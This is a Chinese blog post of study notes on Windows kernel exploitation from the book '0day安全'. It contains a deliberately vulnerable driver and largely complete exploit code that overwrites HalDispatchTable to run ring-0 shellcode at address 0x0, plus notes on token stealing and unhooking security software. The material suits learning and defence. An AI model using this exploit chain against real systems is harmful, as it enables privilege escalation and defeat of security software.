《0day 安全》-22章-内核漏洞利用技术

最新推荐文章于 2024-02-02 16:38:37 发布
最新推荐文章于 2024-02-02 16:38:37 发布
阅读量698 收藏 1
点赞数
分类专栏: 内核漏洞 学习记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38025365/article/details/106126842
版权

内核漏洞利用技术

22.1 利用实验之 exploitme.sys

​ 首先给出实验代码,这里的代码经过作者微小的修改,但是基本与书上一致,看懂这里的代码需要有一点驱动编程基础。

#include<ntddk.h>
#define DEVICE_NAME L"\\Device\\ExploitMe" 
#define DEVICE_LINK L"\\DosDevices\\ExploitMe" 
#define FILE_DEVICE_EXPLOIT_ME 0x00008888 
#define IOCTL_EXPLOIT_ME (ULONG)CTL_CODE(FILE_DEVICE_EXPLOIT_ME, 0x800, METHOD_NEITHER, FILE_WRITE_ACCESS)
//创建设备对象指针
PDEVICE_OBJECT g_DeviceObject;
/*
卸载函数
	输入: 驱动指针
	输出:无
*/
VOID DriverUnload(IN PDRIVER_OBJECT driverObject)
{

	IoDeleteDevice(g_DeviceObject);
	KdPrint(("卸载驱动!"));
}

/*
驱动分发函数
	输入: 驱动对象的指针,Irp指针
	输出:NTSTATUS 类型的结果
*/
NTSTATUS DrvDispatch(IN PDEVICE_OBJECT DriverObject,IN PIRP pIrp )
{
	PIO_STACK_LOCATION pIrpStack;//当前的 pIrp 栈
	PVOID Type3InputBuffer;//用户态输入地址
	PVOID UserBuffer;//用户态输出地址 
	ULONG inputBufferLength;//输入缓冲区的大小
	ULONG outputBufferLength;//输出缓冲区的大小 
	ULONG ioControlCode;//DeviceIoControl 的控制号
	PIO_STATUS_BLOCK IoStatus;//pIrp 的 IO 状态指针
	NTSTATUS ntStatus = STATUS_SUCCESS;//函数返回值 
	//获取数据
	pIrpStack = IoGetCurrentIrpStackLocation(pIrp);
	Type3InputBuffer = pIrpStack->Parameters.DeviceIoControl.Type3InputBuffer;
	UserBuffer = pIrp->UserBuffer;
	inputBufferLength = pIrpStack->Parameters.DeviceIoControl.InputBufferLength;
	outputBufferLength = pIrpStack->Parameters.DeviceIoControl.OutputBufferLength;
	ioControlCode = pIrpStack->Parameters.DeviceIoControl.IoControlCode;
	IoStatus = &pIrp->IoStatus;
	IoStatus->Status = STATUS_SUCCESS;// Assume success 
	IoStatus->Information = 0;// Assume nothing returned 
	//根据 ioControlCode 完成对应的任务
	switch (ioControlCode)
	{
	case IOCTL_EXPLOIT_ME:
		if (inputBufferLength >= 4 && outputBufferLength >= 4)
		{
			*(ULONG*)UserBuffer = *(ULONG*)Type3InputBuffer;
			IoStatus->Information = sizeof(ULONG);
		}
		break;
	}
	//返回
	IoStatus->Status = ntStatus;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT);
	return ntStatus;
}
/*
驱动入口函数
	输入: 驱动对象的指针,服务程序对应的注册表路径
	输出:NTSTATUS 类型的结果
*/
NTSTATUS DriverEntry(IN PDRIVER_OBJECT driverObject, IN PUNICODE_STRING registryPath)
{
	NTSTATUS ntStatus;
	UNICODE_STRING devName;
	UNICODE_STRING symLinkName;
	int i = 0;
	//打印一句调试信息
	KdPrint(("进入主程序咯!"));
	//__debugbreak();
	//设置驱动对象卸载函数
	driverObject->DriverUnload = DriverUnload;
	//创建设备
	RtlInitUnicodeString(&devName, DEVICE_NAME);
	ntStatus = IoCreateDevice(driverObject,
		0,
		&devName,
		FILE_DEVICE_UNKNOWN,
		0,TRUE,
		&g_DeviceObject
		);
	if (!NT_SUCCESS(ntStatus))
	{
		return ntStatus;
	}
	//创建符号链接
	RtlInitUnicodeString(&symLinkName, DEVICE_LINK);
	ntStatus = IoCreateSymbolicLink(&symLinkName, &devName);
	if (!NT_SUCCESS(ntStatus))
	{
		IoDeleteSymbolicLink(&symLinkName);
		IoDeleteDevice(g_DeviceObject);
		return ntStatus;
	}
	//设置该驱动对象的分发函数
	for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
	{
		driverObject->MajorFunction[i] = DrvDispatch;
	}
	//返回成功结果
	return STATUS_SUCCESS;
}

​ 从上述代码可以看出,该explotime.sys 驱动创建的设备名称为“\Device\ExploitMe”,符号链接名称为“DosDevices\ExploitMe”。因此在Ring3里就可以通过设备的符号链接名称”\.\ExploitMe”来打开设备并得到设备句柄,进而使用DeviceIoControl函数来调用驱动的分发函数,与驱动进行交互。

​ 这里的分发函数DrvDispatch中仅仅只处理了一个IoControlCode,即 CTL_CODE(FILE_DEVICE_EXPLOIT_ME, 0x800, METHOD_NEITHER, FILE_WRITE_ACCESS)

处理方式单独摘下,为:

if (inputBufferLength >= 4 && outputBufferLength >= 4)
		{
			*(ULONG*)UserBuffer = *(ULONG*)Type3InputBuffer;
			IoStatus->Information = sizeof(ULONG);
		}

由资料去了解METHOD_NEITHER 内存访问方式。这里我们直接说作用,使用该内存访问方式会导致 Type3InputBuffer 表示Ring3输入缓冲区指针, UserBuffer 表示Ring3输出缓冲区指针, inputBufferLength 表示Ring3输入缓冲区的大小(字节数),outputBufferLength 表示Ring3输出缓冲区的大小。即该处理实际上是将Ring3输入缓冲区的第一个ULONG数据写入Ring3输出缓冲区的第一个ULONG数据中。输出和输出都是由Ring3程序来指定的,读写却是在Ring0中完成的。因此Ring3可以将输出缓冲区地址指定为该内核高端地址,这里相当于篡改了内核中任意地址的数据,而且可以纂改为任何值。

​ 很多的漏洞类型都可以归纳为该漏洞模型,属于“任意地址写任意数据内核漏洞”。

22.2 内核漏洞利用思路

​ 从漏洞的利用来看,远程拒绝服务和本地拒绝五福类型的内核漏洞利用起来比较简单,不必过多地考虑“构造”。相反,远程任意代码执行和本地权限提升类型的内核漏洞利用起来往往比较复杂,需要有精心的构造,包括漏洞触发条件的构造,相关数据结构的构造等。

​ 从漏洞公布的数量来看,远程任意代码执行类型的内核漏洞已经很少见了,更多的是本地权限提升类型的内核漏洞。驱动程序编译器默认的都是开启GS选项,直接利用缓冲区溢出比较困难,因此我们更希望能够篡改系统内核数据来执行Ring0 Shellcode 的漏洞,进而达到漏洞的利用目的。图22.2.1展示了目前常见的内核漏洞利用思路。
在这里插入图片描述

​ 能够篡改系统内核内存数据或执行Ring0 Shellcode的漏洞,目前主要有这三种:任意地址写任意数据、固定地址写任意数据和任意地址写固定数据的内核漏洞。其中任意地址写仍难以数据类型内核漏洞必定能够造成本地权限提升,而后两种漏洞如果在实际情形下利用得当,也可以造成本地权限提升。这三种类型的漏洞也是驱动程序所特有的。

22.3 内核漏洞的利用方法

​ 目前常见的内核漏洞利用方法主要有两种:一是篡改内核内存数据;二是执行Ring0 Shellcode。

​ 在实际利用中,第一种方法并不推荐。因为很多重要的内核内存数据都是不可直接被改写的。如果内存所在页的属性被标记为只读,并且CR0寄存器的WP位设置为1时,是不能直接写入该内存的。如果一定要篡改该内存,需要采用第二种方法,在Ring0 Shellcode中,首先将CR0的寄存器的WP位置0,即禁用内存保护,篡改完后,再恢复WP位即可。

​ 第二种方法,我们知道在Ring0中有很多内核API函数,这些函数大多保存在一些表中,并且这个表也是由内核到处的。例如SSDT、halDispatchTable等。乳沟能修改这些表中的内核API函数地址为事先准备好的ShellCode存放的地址,然后在本进程中调用这个内核API函数,这样便实现了在Ring0 权限下执行Shellcode的目的。

​ 在使用该方法时,需要注意在选用内核API的时候,一定要选用冷门函数。因为我们的Shellcode保存在自己进程的Ring3内存地址中。别的进程无法访问到,别的进程一旦也调用这个内核API函数,就会导致内存访问错误或内核崩溃。

​ 这里我们尝试对22.1节中的漏洞进行利用。该漏洞能够使得向任意地址写任意数据,例如可以将HalDispatchTable表中的第一个函数HalQuerySystemInformation入口地址篡改为0,需要狗仔的DeviceControl函数的主要参数如表22-3-1所示。

在这里插入图片描述

​ 这里HalDispatchTable是内核模块hal.dll导出的一个函数表,具体结构如下所示:

typedef struct { 
 ULONG Version; 
 pHalQuerySystemInformation HalQuerySystemInformation; 
 pHalSetSystemInformation HalSetSystemInformation; 
 pHalQueryBusSlots HalQueryBusSlots; 
 ULONG Spare1; 
 pHalExamineMBR HalExamineMBR; 
 pHalIoReadPartitionTable HalIoReadPartitionTable; 
 pHalIoSetPartitionInformation HalIoSetPartitionInformation; 
 pHalIoWritePartitionTable HalIoWritePartitionTable; 
 pHalHandlerForBus HalReferenceHandlerForBus; 
 pHalReferenceBusHandler HalReferenceBusHandler; 
 pHalReferenceBusHandler HalDereferenceBusHandler; 
 pHalInitPnpDriver HalInitPnpDriver; 
 pHalInitPowerManagement HalInitPowerManagement; 
 pHalGetDmaAdapter HalGetDmaAdapter; 
 pHalGetInterruptTranslator HalGetInterruptTranslator; 
 pHalStartMirroring HalStartMirroring; 
 pHalEndMirroring HalEndMirroring; 
 pHalMirrorPhysicalMemory HalMirrorPhysicalMemory; 
 pHalEndOfBoot HalEndOfBoot; 
 pHalMirrorVerify HalMirrorVerify; 
 pHalGetAcpiTable HalGetCachedAcpiTable; 
 pHalSetPciErrorHandlerCallback HalSetPciErrorHandlerCallback; 
#if defined(_IA64_) 
 pHalGetErrorCapList HalGetErrorCapList; 
 pHalInjectError HalInjectError; 
#endif 
} HAL_DISPATCH, *PHAL_DISPATCH;

​ 这个结构中的第一个ULONG是一个版本号,第二个就是我们需要关注的HalQuerySystemInformation 函数的地址。所以针对该漏洞的利用方法可以概括为: 首先在当前进程(exploit.exe)的0x0地址处申请内存,并存放Ring0 Shellcode代码,然后利用漏洞将HalDispatchTable中的HalQuerySystemInformation函数地址改写为0x0,最后再调用该函数的上层封装函数NtQueryIntervalProfile,这样就会导致事先准备好的Ring0 Shellcode被执行。

​ 首先解释一下这两个函数的调用关系。只要调用 NtQueryIntervalProfile函数,输入的第一个参数ProfileSource不等于ProfileTime和ProfileAlignmentFixup那么最终就会调用HalQuerySystemInformation函数。由于利用内核漏洞的Shellcode运行在Ring0环境下,因此称为Ring0 Shellcode。

​ Ring0 Shellcode常见的用法可以整理为一下几种方式。

  • 提权到SYSTEM。修改当前进程的token为SYSTEM进程的token,这样当前进程便具备了系统最高权限。
  • 恢复内核Hook/Inline Hook。目前大多数系统都安装了各式各样的安全软件,二这些安全软件也大部分是通过Hook/Inline Hook系统内核函数来实现防御的。因此可以通过恢复这些内核Hook/InlineHook来突破安全软件,甚至瓦解整个防御体系。
  • 添加调用门/中断门/任务门/陷阱门。四门机制是出入Ring0/Ring3的重要手段。若能在系统中成功添加一个门,就能在后续代码中自由出入Ring0和Ring3。

22.4 内核漏洞利用实战与编程

​ 前两节介绍了内核漏洞的利用思路和方法。接下来将展示整个过程和代码细节。

​ 回顾漏洞。该漏洞存在于分发函数中对IOCTL_EXPLOIT_ME(0x8888A003) 的IoControlCode 处理过程。由于IOCTL_EXPLOIT_ME 的最后两位为3,代表所用通信方式为METHON_NEITHER方式。而该分发函数中并没有使用ProbeFoRead和ProbeForWtire函数探测输入输出地址是否可读和可写。因此该漏洞是一个非常典型的”任意地址写任意数据“类型的内核漏洞。这里采用执行Ring0 Shellcode 方法。利用过程大致分为以下5个步骤。

1. 获取HalDispatchTable表地址 x

​ HalDispatchTable 是由内核模块导出的。要得到HalDispatchTable在内核中的准确地址,首先要得到内核模块的基址,再加上HalDipatchTable与内核模块基址的偏移。

 NTSTATUS NtStatus=STATUS_UNSUCCESSFUL; 
 ULONG ReturnLength = 0; 
 ULONG ImageBase = 0; 
 PVOID MappedBase = NULL; 
 UCHAR ImageName[KERNEL_NAME_LENGTH]={0}; 
 ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES; 
 PVOID HalDispatchTable=NULL; 
 PVOID xHalQuerySystemInformation=NULL; 
 ULONG ShellCodeSize = (ULONG)EndofMyShellCode-(ULONG)MyShellCode; 
 PVOID ShellCodeAddress=NULL; 
 UNICODE_STRING DllName={0}; 
 SYSTEM_MODULE_INFORMATION_EX *ModuleInformation = NULL; 
int RetryTimes=10; 
 // 
 //获取 内核模块基址 和 内核模块名称
 // 
 //获取内核模块列表数据大小到 ReturnLength
 NtStatus = ZwQuerySystemInformation( 
 SystemModuleInformation, 
 ModuleInformation, 
 ReturnLength, 
 &ReturnLength); 
 if(NtStatus != STATUS_INFO_LENGTH_MISMATCH) 
 return; 
 //申请内存 存放内核模块列表数据
 ModuleInformation= 
 (SYSTEM_MODULE_INFORMATION_EX *)malloc(ReturnLength); 
 if(!ModuleInformation) 
 return; 
 //获取内核模块列表数据到 ModuleInformation 
 NtStatus = ZwQuerySystemInformation( 
 SystemModuleInformation, 
 ModuleInformation, 
 ReturnLength, 
 NULL); 
 if(NtStatus != STATUS_SUCCESS) 
 { 
 free(ModuleInformation); 
 return; 
 } 
 //从内核模块列表获取内核第一个模块的基址和名称
 ImageBase = (ULONG)(ModuleInformation->Module[0].Base); 
 RtlMoveMemory(ImageName, 
 (PVOID)(ModuleInformation->Module[0].ImageName + 
 ModuleInformation->Module[0].ModuleNameOffset), 
 KERNEL_NAME_LENGTH); 
 //释放存放内核模块列表的内存
 free(ModuleInformation); 
 //获取内核模块的 UnicodeString 
 RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName); 
 // 
 //加载内核模块到本地进程 
 // 
 NtStatus = (NTSTATUS)LdrLoadDll( 
 NULL, // DllPath 
 &DllCharacteristics, // DllCharacteristics 
 &DllName, // DllName 
 &MappedBase); // DllHandle 
 if(NtStatus) 
 return ; 
 // 
 //获取内核 HalDispatchTable 函数表地址
 // 
 HalDispatchTable=GetProcAddress((HMODULE)MappedBase,"HalDispatchTable"); 
 if(HalDispatchTable==NULL) 
 return ; 
 HalDispatchTable = (PVOID)((ULONG)HalDispatchTable- 
 (ULONG)MappedBase +ImageBase); 
 xHalQuerySystemInformation = (PVOID)((ULONG)HalDispatchTable + 
 sizeof(ULONG)); 
 // 
 //卸载本地进程中的内核模块
 // 
 LdrUnloadDll((PVOID)MappedBase);

​ 整理一下过程,首先枚举了内核中已加载的模块。获取长度,再根据获取到的长度申请内存和枚举模块,最后释放内存。方法为:

//功能号为11,先获取所需的缓冲区大小
ZwQuerySystemInformation(SystemModuleInformation,NULL,0,&needlen);
//申请内存
ZwAllocateVirtualMemory(NtCurrentProcess(),(PVOID*)&pBuf,0,&needlen,MEM_COMMIT,PAGE_READWRITE);
//再次调用
ZwQuerySystemInformation(SystemModuleInformation,(PVOID)pBuf,truelen,&needlen);
......
//最后,释放内存
ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&pBuf,&needlen,MEM_RELEASE);

​ 然后获取内核中第一个模块的基址和名称,通过内核模块的名称将该模块加载到本地进程。然后从该模块获取想要的函数表地址,进而得到目标函数地址。然后根据函数地址减去函数在进程中模块的基址得到函数的偏移,再用该偏移加上模块在内核里的基址即可得到该函数在内核中的地址。

​ 这里x就是HalDispatchTable在内核中的地址,通过该地址x,那么x+4就是我们要找到HalQuerySystemInformation函数地址,所以y=x+4,y就是HalQuerySystemInformation函数地址。

2. 在0x0处申请一段内存,并写入Ring0 Shellcode

​ 在指定的地址申请内存,推荐使用ZwAllocateVirtualMemory函数,该函数的第二个参数BaseAddress是一个指针,指向的便是要申请的内存的地址。系统会从指定的地址开始向下搜寻,找到一段需要大小的内存。

 // 
 //申请本地进程内存 存放 Ring0 Shellcode 
 // 
 ShellCodeAddress = (PVOID)sizeof(ULONG); 
 NtStatus = ZwAllocateVirtualMemory( 
 NtCurrentProcess(), // ProcessHandle 
 &ShellCodeAddress, // BaseAddress 
 0, // ZeroBits 
 &ShellCodeSize, // AllocationSize 
 MEM_RESERVE | 
 MEM_COMMIT | 
 MEM_TOP_DOWN, // AllocationType 
 PAGE_EXECUTE_READWRITE); // Protect 
 if(NtStatus) 
 return ; 
 //存放前面写好的 shellcode 
 RtlMoveMemory(ShellCodeAddress,(PVOID)MyShellCode,ShellCodeSize);

​ 通过该代码,如果不发生错误的话,可以在0X0处申请到ShellCodeSize大小的内存,然后将准备好的Ring0 Shellcode复制到该内存处。

3. 利用漏洞地址向y写入0x0

​ 目标地址y已经得到,这里就利用驱动漏洞,向目标地址y写入0x0,代码如下:

// 
//触发漏洞并利用
// 
//设备名称的 Unicode 字符串
RtlInitUnicodeString(&DeviceName, L"\\Device\\ExploitMe"); 
//打开 ExploitMe 设备
ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES); 
ObjectAttributes.RootDirectory = 0; 
ObjectAttributes.ObjectName = &DeviceName; 
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; 
ObjectAttributes.SecurityDescriptor = NULL; 
ObjectAttributes.SecurityQualityOfService = NULL; 
NtStatus = NtCreateFile( 
 &DeviceHandle, // FileHandle 
 FILE_READ_DATA | 
 FILE_WRITE_DATA, // DesiredAccess 
 &ObjectAttributes, // ObjectAttributes 
 &IoStatusBlock, // IoStatusBlock 
 NULL, // AllocationSize OPTIONAL 
 0, // FileAttributes 
 FILE_SHARE_READ | 
 FILE_SHARE_WRITE, // ShareAccess 
 FILE_OPEN_IF, // CreateDisposition 
 0, // CreateOptions 
 NULL, // EaBuffer OPTIONAL 
 0); // EaLength 
if(NtStatus) 
{ 
 printf("NtCreateFile failed! NtStatus=%.8X\n", NtStatus); 
 goto ret; 
} 
//利用漏洞将 HalQuerySystemInformation 函数地址改为0
InputData = 0; 
NtStatus = NtDeviceIoControlFile( 
 DeviceHandle, // FileHandle 
 NULL, // Event 
 NULL, // ApcRoutine 
 NULL, // ApcContext 
 &IoStatusBlock, // IoStatusBlock 
 IOCTL_METHOD_NEITHER, // IoControlCode 
 &InputData, // InputBuffer
BUFFER_LENGTH, // InputBufferLength 
 xHalQuerySystemInformation, // OutputBuffer 
 BUFFER_LENGTH); // OutBufferLength 
if(NtStatus) 
{ 
 printf("NtDeviceIoControlFile failed! NtStatus=%.8X\n", NtStatus); 
 goto ret; 
}
4. 调用NtQueryIntervalProfile函数

​ 通过上面第三步,已经将HalDispatchTable表中的第一个函数地址修改为了0x0,也就是说此时调用NtQueryInterValProfile函数,恰好会落在0x0处内存事先准备好的Ring0 Shellcode。

​ 为了确保Ring0 Shellcode被调用,我们在Ring0 Shellcode中将全局变量 g_isRing0ShellcodeCalled设置为1,如果在调用完NtQueryInterValProfile后,g_isRingShellcodeCalled被设置为1,则说明Ring0 shellcode被成功调用。漏洞利用成功。

//漏洞利用 
while(RetryTimes>0) 
{ 
 NtStatus = NtQueryIntervalProfile( 
 ProfileTotalIssues, // Source 
 NULL); // Interval 
 if(NtStatus==0) 
 { 
 printf("NtQueryIntervalProfile ok!\n"); 
 } 
 Sleep(1000); 
 if(g_isRing0ShellcodeCalled==1) 
 break; 
 RetryTimes--; 
} 
//判断漏洞利用是否成功
if(RetryTimes==0 && g_isRing0ShellcodeCalled==0) 
 printf("漏洞利用失败!\n"); 
else 
 printf("漏洞利用成功!\n");
5. Ring0 Shellcode被执行

​ 这里给出 Ring0 Shellcode

NTSTATUS MyShellCode( 
 ULONG InformationClass,
 ULONG BufferSize, 
 PVOID Buffer, 
 PULONG ReturnedLength) 
 { 
 //关闭内核写保护
 __asm 
 { 
 cli 
 mov eax, cr0 
 mov g_uCr0,eax 
 and eax,0xFFFEFFFF 
 mov cr0, eax 
 } 
 //do something in ring0 ...... 
 
 //恢复内核写保护
 _asm 
 { 
 sti 
 mov eax, g_uCr0 
 mov cr0, eax 
 } 
 //将全局变量置为 1,说明 Ring0 Shellcode 已经被调用了
 g_isRing0ShellcodeCalled=1; 
 return 0; 
 } 
void EndofMyShellCode(){}

​ 经过艰难的代码编译阶段,成功利用了!不过书上所截的源代码有问题,需要经过一些修改。

在这里插入图片描述

至于后续提权的Shellcode就不测试了,因为只要达到能够执行任意代码的程度,只是更换Shellcode的问题了。

明日计划

继续学习内核漏洞

Wwoc
关注
专栏目录
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 650
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文,希望对您有所帮助!
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
最新发布
杨秀璋的专栏
07-14 562
上一篇文将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
内核漏洞利用之CVE-2020-17382篇(下)
systemino的博客
11-26 682
在本文中,我们将以CVE-2020-17382漏洞为例来介绍内核漏洞是如何被武器化的。 在上一篇文中,我们首先解释了攻击者为什么会以驱动程序为攻击目标,然后,分析了驱动程序的组成部分,最后,讲解了驱动程序的逆向分析和调试方法。在本文中,我们将以CVE-2020-17382漏洞为例为读者介绍内核漏洞的利用过程。 攻击MSIO64.sys 现在,我们知道了如何在Ring0中获得指令指针的控制权,接下来,我们将为读者演示如何开发不同的POC。我们将要使用的shellcode是一个标准的Token Stea
内核漏洞利用技术
dengyao6547的博客
08-15 191
有漏洞的驱动exploitme.sys 在Ring3可以通过设备名称“\\.\ExploitMe”打开设备,得到设备句柄,进而使用DeviceIoControl函数调用驱动的派遣例程,与驱动进行交互。 输入、输出地址都是由Ring3程序指定,读写是在Ring0中完成。因此Ring3可以将输出缓冲区地址指定为内核高端地址,可以篡改内核中任意地址的数据。 内核漏洞利用思路 能够篡改系...
初识linux内核漏洞利用
12-12 215
0x00 简介 之前只接触过应用层的漏洞利用, 这次第一次接触到内核层次的,小结一下。 0x01 概况 这次接触到的,是吾爱破解挑战赛里的一个题,给了一个有问题的驱动程序,要求在ubuntu 14.04 32位系统环境下提权。驱动实现了write函数,但是write可以写0x5a0000000个字节。然后还实现了一个ioctl,这里有任意地址写的问题(但是这个分析里没用到)...
内核漏洞利用】TokyoWesternsCTF-2019-gnote Double-Fetch
panhewu9919的博客
09-16 1736
一、CVE-2015-8550 漏洞详情可以参见https://wpengfei.github.io/cpedoc-accepted.pdf。 [外链图片转存失败(img-tzpkzvE3-1568621850784)(/Users/john/Desktop/tmp/2019ctf/TokyoWesternsCTF/gnote/writeup/CVE-2015-8550.png)] gcc 编译s...
安全漏洞一内核漏洞利用
kali_Ma的博客
10-20 3179
漏洞描述 Windows 事件跟踪 (ETW) 机制允许记录内核或应用程序定义的事件以进行调试。 开发人员能够启动和停止事件跟踪会话,检测应用程序以提供跟踪事件,并通过调用 ETW 用户模式 Windows API 集来使用跟踪事件。 最终,这些将导致对内核 (ntoskrnl.exe) 的相应系统调用请求以执行功能。在ETW请求更新周期性捕获状态中,在特定条件下,存在一个use-after-free漏洞,攻击者可以可控地分配一个0x30字节的缓冲区,释放它,然后重用这个缓冲区来执行任意代码。该漏洞于202
蛇噬汝果_-_基于Python的OSX内核漏洞模糊测试挖掘和利用.pdf
08-07
本演讲将介绍系统性模糊测试和挖掘OSX内核漏洞的方法,及如何利用Python提升模糊测试和漏洞挖掘分析效率,并最终分析我们发现的数个OSX内核中的0day。我们将介绍如何利用Python实现自动化提取驱动攻击面和生成测试...
linux 内核漏洞,Linux内核漏洞CVE-2016-0728的分析与利用
weixin_42183486的博客
04-29 1605
介绍Perception Point研究团队已经在Linux操作系统的内核中发现了一个0 day漏洞,这是一个本地提权漏洞。这个漏洞从2012年开始就存在于Linux的内核中了,但是我们的团队最近才发现了这个漏洞,并将漏洞的详细信息报告给了内核安全团队。在此之后,我们还发布了一个针对此漏洞的概念验证利用实例。截止至漏洞披露的那一天,这个漏洞已经影响了大约数千万的安装了Linux操作系统的个人计算机...
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
weixin_43894771的博客
03-10 2043
*0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*
内核漏洞利用】绕过CONFIG_SLAB_FREELIST_HARDENED防护—kernoob两种解法
panhewu9919的博客
12-28 1436
环境下载:download 题目来源:XCTF高校战"疫"分享赛 1.漏洞分析 功能分析: // 共 4 个功能:add_note、del_note、show_note、edit_note,用户输入 user_input 格式——(index+user_addr+size),全局数组pool处存放(note+size)。、 // 1.add_note cmd=0x30000 signed __int64 __usercall add_note@<rax>(__int64 a1@<rbp&
Linux下内核漏洞利用几种方法,【linux内核漏洞利用】ret2dir利用方法
weixin_30709043的博客
05-04 307
完全参考rtfingc的文linux kernel pwn 之 ret2dir 学习,附赠文件及源码点这里,原文中给出的kpwn.c文件有错误,现已更正。目的:利用return-to-direct-mapped memory(ret2dir)攻击技术绕过SMEP,SMAP,PXN,KERNEXEC,UDEREF,KGuard保护。简单来说,通过利用一个核心区域,直接映射系统的一部分或全部物理内存...
解析Linux内核内存管理与漏洞利用
Chinese_big_boy的博客
08-29 534
网上已经有很多关于Linux内核内存管理的分析和介绍了,但是不影响我再写一篇:) 一方面是作为其他文的补充,另一方面则自己学习的记录、总结和沉淀。所谓条条大路通罗马,本文只作为其中一条路,强烈建议想去罗马的朋友看完文末所列举的参考文。在我们平时学习相对复杂的系统时,仅仅了解实现文档只能算是走出第一步;阅读代码并且上机调试可以将理解加深一个层次,知道“what's inside“;不过,如果能从攻击者的角度去分析和利用(滥用),那理解又会加深一个层次,真正做到”inside out“。...
0day安全:软件漏洞分析技术——系统内核漏洞
摔不死的笨鸟的博客
04-03 1565
内核漏洞主要的作用包括:远程任意代码执行,本地权限提升,远程。拒绝服务攻击,本地拒绝服务攻击。从漏洞的利用来看,远程拒绝服务和本地拒绝服务类型的内核漏洞利用起来比较简单,不必过多地考虑“构造”(构造漏洞成功触发的条件和数据)。相反,远程任意代码执行和本地权限提升类型的内核漏洞,利用起来往往比较复杂,需要有精心的构造,包括漏洞触发条件的构造,相关数据的构造等。 从公布的漏洞数量来看,远程任意代码执...
在地址0上分配内存
weixin_34221036的博客
10-22 314
2019独角兽企业重金招聘Python工程师标准>>> ...
函数ZwQuerySystemInformation小结
06-05 385
该函数存在于NTDLL.DLL动态链接库中。NTDLL.DLL负责ring3与ring0之间的通信。当使用子系统方式进行系统调用的时候,ntdll.dll和SSDT会配合使用。关于SSDT技术以后会讲解到。 关于ZwQuerySystemInformation这个函数可以用来查询进程信息、内核信息、硬件信息(例如CPU数目)、句柄信息、时间信息等54个系统信息。 该函数的原型是 NTST
HEVD 内核漏洞之任意内存覆盖漏洞
qq_41071646的博客
09-28 324
任意内存覆盖 对于 那些比较老旧的系统而言 我感觉还是比较简单的 但是对于那些 新的系统 新加的那些保护来看的话 估计就比较困难了 先说0day的那个demo 驱动的代码如下 /******************************************************************** created: 2010/12/06 filenam...
内核漏洞利用:容器共享宿主机的内核内核漏洞可能被利用来攻击整个系统
图幻未来的博客
02-02 304
本文将探讨容器与宿主机之间的紧密耦合所引入的内核安全风险,以及针对这些风险的潜在威胁. 我们还讨论了如何加强容器安全性并降低此类风险的可能性.
Windows NT引导过程源代码分析(三)
hnzwx888的专栏
06-20 1066
1.3建立用户登录会话 Windows内核在阶段1初始化的最后,启动了一个用户模式进程——会话管理器子系统(smss)。Smss进程是Windows操作系统的关键组成部分,它尽管是一个用户模式进程,但有其特殊性:首先,它是可信的,这意味着它可以做一些其他用户进程无法做的事情,比如创建安全令牌;其次,它直接建立在Windows内核的基础上,只使用Windows内核提供的系统服务,...
0day漏洞分析宝典:全面解读Windows安全防护
0day+安全:软件漏洞分析技术(第2版)》是一本深入探讨Windows平台缓冲区溢出漏洞分析、检测与防护的专业书籍。全书共分五篇,共计33,内容涵盖了漏洞exploit的理论基础和初级技术,以及前沿的研究成果。第一篇...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值